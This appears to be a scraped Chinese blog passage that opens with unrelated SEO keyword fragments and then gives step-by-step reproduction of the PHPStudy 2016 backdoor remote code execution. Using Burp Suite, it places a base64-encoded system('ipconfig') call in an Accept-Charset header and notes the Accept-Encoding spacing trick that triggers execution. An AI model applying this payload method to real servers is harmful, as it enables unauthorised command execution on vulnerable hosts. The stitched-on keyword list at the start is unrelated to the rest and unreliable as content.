鹤岗做网站,wordpress 3.5 基础教程 王皓 视频下载,手机会员卡管理系统,数字媒体艺术设计主要学什么文章目录 漏洞描述漏洞验证 漏洞描述 PHPStudyRCE#xff08;Remote Code Execution#xff09;#xff0c;也称为phpstudy_backdoor漏洞#xff0c;是指PHPStudy软件中存在的一个远程代码执行漏洞。 漏洞验证
打开phpstudy2016#xff0c;用bp自带的浏览器访问www目录下… 文章目录 漏洞描述漏洞验证 漏洞描述 PHPStudyRCERemote Code Execution也称为phpstudy_backdoor漏洞是指PHPStudy软件中存在的一个远程代码执行漏洞。 漏洞验证
打开phpstudy2016用bp自带的浏览器访问www目录下的phpinfo.php文件访问后结果如下
然后在bp中将抓到的数据包发送到repeater模块 将system(‘ipconfig’);命令做base64编码
system(ipconfig);编码后
c3lzdGVtKCdpcGNvbmZpZycpOw然后在repeater模块添加Accept-Charset: 字段将base64编码放入
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw注意Accept-Encoding字段中gzip和deflate之间不能有空格 去掉空格后点击send发送ipconfig命令被执行
